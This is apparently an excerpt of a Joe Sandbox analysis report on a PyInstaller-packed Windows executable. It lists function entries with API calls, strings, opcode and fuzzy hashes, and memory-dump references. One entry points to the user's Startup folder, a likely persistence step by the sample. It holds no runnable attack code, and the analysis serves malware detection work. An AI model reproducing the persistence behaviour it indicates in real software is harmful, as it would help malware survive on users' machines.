                                                                                                      • Instruction ID: 88b910a34e334926ece8d5165621c3672ee07b3d57278d7f697a5275994781ca
                                                                                                      • Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                      • Instruction Fuzzy Hash: 8D315072A1968989EF24AB65F8552F9A3A0FFC9784FC80135EA4D4BB49DF3CD106C710
                                                                                                      APIs
                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF75713918F,?,00007FF757133C55), ref: 00007FF757132BA0
                                                                                                      • MessageBoxW.USER32 ref: 00007FF757132C2A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentMessageProcess
                                                                                                      • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                      • API String ID: 1672936522-3797743490
                                                                                                      • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                      • Instruction ID: ade4f3c50db0b4c7bfef3477652160213b6bce640137f216c1d7665eba05d235
                                                                                                      • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                      • Instruction Fuzzy Hash: B421D162B08B4582EB20AB54F8417EAA3A4FBC8784F840136EE8D57659EE3CD206C750
                                                                                                      APIs
                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF757131B99), ref: 00007FF757132760
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcess
                                                                                                      • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                      • API String ID: 2050909247-1591803126
                                                                                                      • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                      • Instruction ID: 8c75433d470b934895fb3b9be56d739fa9d34e59546aa476e6bfc53fb2311466
                                                                                                      • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                      • Instruction Fuzzy Hash: 0321A372A19B8982EB20EB54B8417E6A394FBC8384F840131EE8D43659DF7CD1468750
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                      • Instruction ID: 467ee84de929880e4fe120bc033f6e9aea783dc3ba14b40364c66a41603c1e49
                                                                                                      • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                      • Instruction Fuzzy Hash: 28F06821B0970A81EE24AB14F4597759371AFC5761FDC0235D56E455F4DF2CD046C760
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _set_statfp
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156100317-0
                                                                                                      • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                      • Instruction ID: 619af96861c59176039f7d39e6bcd5627d6a2e1ca547911f85ab8bd89386ba61
                                                                                                      • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                      • Instruction Fuzzy Hash: 24116336D58A0A81FE9C317DF5993799150AFD9360ECC0634EABF162D6CE6C68434D32
                                                                                                      APIs
                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF75714A5A3,?,?,00000000,00007FF75714A83E,?,?,?,?,?,00007FF75714A7CA), ref: 00007FF75714B3AF
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF75714A5A3,?,?,00000000,00007FF75714A83E,?,?,?,?,?,00007FF75714A7CA), ref: 00007FF75714B3CE
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF75714A5A3,?,?,00000000,00007FF75714A83E,?,?,?,?,?,00007FF75714A7CA), ref: 00007FF75714B3F6
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF75714A5A3,?,?,00000000,00007FF75714A83E,?,?,?,?,?,00007FF75714A7CA), ref: 00007FF75714B407
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF75714A5A3,?,?,00000000,00007FF75714A83E,?,?,?,?,?,00007FF75714A7CA), ref: 00007FF75714B418
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID:
                                                                                                      • API String ID: 3702945584-0
                                                                                                      • Opcode ID: 076d9937837767d8c0599fb7139188ad361754fd070b51876ae2b58645e7f25c
                                                                                                      • Instruction ID: 4e61c9ec400d5ec0eb51fb822a0ec097dee89214f557e9292982c606afd195c3
                                                                                                      • Opcode Fuzzy Hash: 076d9937837767d8c0599fb7139188ad361754fd070b51876ae2b58645e7f25c
                                                                                                      • Instruction Fuzzy Hash: 03116D60F0D64A41FE68B326BA52139A1475FC47B0FDC9334E83E46BC6EE2DA4038320
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID:
                                                                                                      • API String ID: 3702945584-0
                                                                                                      • Opcode ID: 84df6eade7ca2759e64539926e88efdc2e23a1e9973d593929f07b0eae7a4c09
                                                                                                      • Instruction ID: 1aff8ca71b5b24ccc39daecc6caad79c7cbe14ac891cfc208567ff4def76db14
                                                                                                      • Opcode Fuzzy Hash: 84df6eade7ca2759e64539926e88efdc2e23a1e9973d593929f07b0eae7a4c09
                                                                                                      • Instruction Fuzzy Hash: C811F260E0828E41FD68B3A16A1397A91575FC5320F9C8734E93E4A6C2FD2EB4435231
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: verbose
                                                                                                      • API String ID: 3215553584-579935070
                                                                                                      • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                      • Instruction ID: 07da6e89de7c1e40f6ca490e0e128221cba6d8783413be86cef638212f8b86db
                                                                                                      • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                      • Instruction Fuzzy Hash: BF91B722E0864A41FF65AE24E45277DB6A2ABC0F58FCC4136DA5D473D5FE3CE4468321
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                      • API String ID: 3215553584-1196891531
                                                                                                      • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                      • Instruction ID: 3af002d0cc8ce37e22bab11de725fbe515e9288946911cfa77ad8f64df61ba7b
                                                                                                      • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                      • Instruction Fuzzy Hash: 1381C7F2D0814B85FF747F25A102678A6AAAB91B44FDD4035CA0DA7385EB2DE9079321
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2395640692-1018135373
                                                                                                      • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                      • Instruction ID: 71d4e7bc7ac180e561893c5faa019815100f5347b31ba59b288d720e1610ae67
                                                                                                      • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                      • Instruction Fuzzy Hash: 8151A136B1965A8AEF14EF15F044A78B391EB84BD8F988130EA8E47744DF7CE842C710
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                      • String ID: MOC$RCC
                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                      • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                      • Instruction ID: cafcf6c4f4f252950b8482e5072c6f586bd3e9259fa573eee8d8d719c61143c2
                                                                                                      • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                      • Instruction Fuzzy Hash: A5618F72908BC985EB20AB15F4403AAB7A4FBC5784F484225EB9C47B99DF7CD195CB10
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                      • String ID: csm$csm
                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                      • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                      • Instruction ID: a25bfbaf2d09ab385e4a3dab924c768a1277a911cef9f1253fd54e723a99626b
                                                                                                      • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                      • Instruction Fuzzy Hash: 4451B4B260834EC6EF34AB21A044668B798FB95B94F9C4135DA4D47B95CF3CE452C711
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message
                                                                                                      • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                      • API String ID: 2030045667-255084403
                                                                                                      • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                      • Instruction ID: e4f38d97cc8feca2aa25c127a046e8630290b388359c4cedc7e5120446a80b31
                                                                                                      • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                      • Instruction Fuzzy Hash: 3321D172B08B4582EB20AB54F4417EAA3A0FBC8784F840136EE8D97659EE3CD246C750
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                      • String ID:
                                                                                                      • API String ID: 2718003287-0
                                                                                                      • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                      • Instruction ID: 93bd72254b42d6adb3afa5c6228e9cb6d26cefddab35b6db928ffab4d2b140e1
                                                                                                      • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                      • Instruction Fuzzy Hash: 24D1F372F08B498AEB10DF65E4412AC77B2FB94798B884235DE4D97B99EE38D407C710
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LongWindow$DialogInvalidateRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 1956198572-0
                                                                                                      • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                      • Instruction ID: 9d66b320e2c572a256b2f94e511adb2fe2163f782270366da542e594b14fc227
                                                                                                      • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                      • Instruction Fuzzy Hash: 3011A931B1C54E42FE64B769FA446799251EBC5780FCC8030DB490BB99CD2DD4D68620
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2933794660-0
                                                                                                      • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                      • Instruction ID: 0e257e63a6ee7bc2ebe9038e66499b994de4771caa6442f9491f6333e52dae8d
                                                                                                      • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                      • Instruction Fuzzy Hash: F7114F22B14B49C9EF00AF64F8442B973A4F759758F880E31DA5D46B64DF38E1598350
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                      • String ID: ?
                                                                                                      • API String ID: 1286766494-1684325040
                                                                                                      • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                      • Instruction ID: 5d91f9ea75d8b659c9df7a36f301109debe171d87cf2fc4eae936cb6148415f8
                                                                                                      • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                      • Instruction Fuzzy Hash: 59411C12A1824946FF68A72AF405379E762EBC07A4FD84235EE5C06AD5DF3CD4438B10
                                                                                                      APIs
                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF757149046
                                                                                                        • Part of subcall function 00007FF75714A948: RtlFreeHeap.NTDLL(?,?,?,00007FF757152D22,?,?,?,00007FF757152D5F,?,?,00000000,00007FF757153225,?,?,?,00007FF757153157), ref: 00007FF75714A95E
                                                                                                        • Part of subcall function 00007FF75714A948: GetLastError.KERNEL32(?,?,?,00007FF757152D22,?,?,?,00007FF757152D5F,?,?,00000000,00007FF757153225,?,?,?,00007FF757153157), ref: 00007FF75714A968
                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF75713CBA5), ref: 00007FF757149064
                                                                                                      Strings
                                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\, xrefs: 00007FF757149052
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                                                                                                      • API String ID: 3580290477-2347470727
                                                                                                      • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                      • Instruction ID: 2556ecad7fc1fd3f3f161acab7978e83fa0b69b6f2c011d57d1180afa0ae7bec
                                                                                                      • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
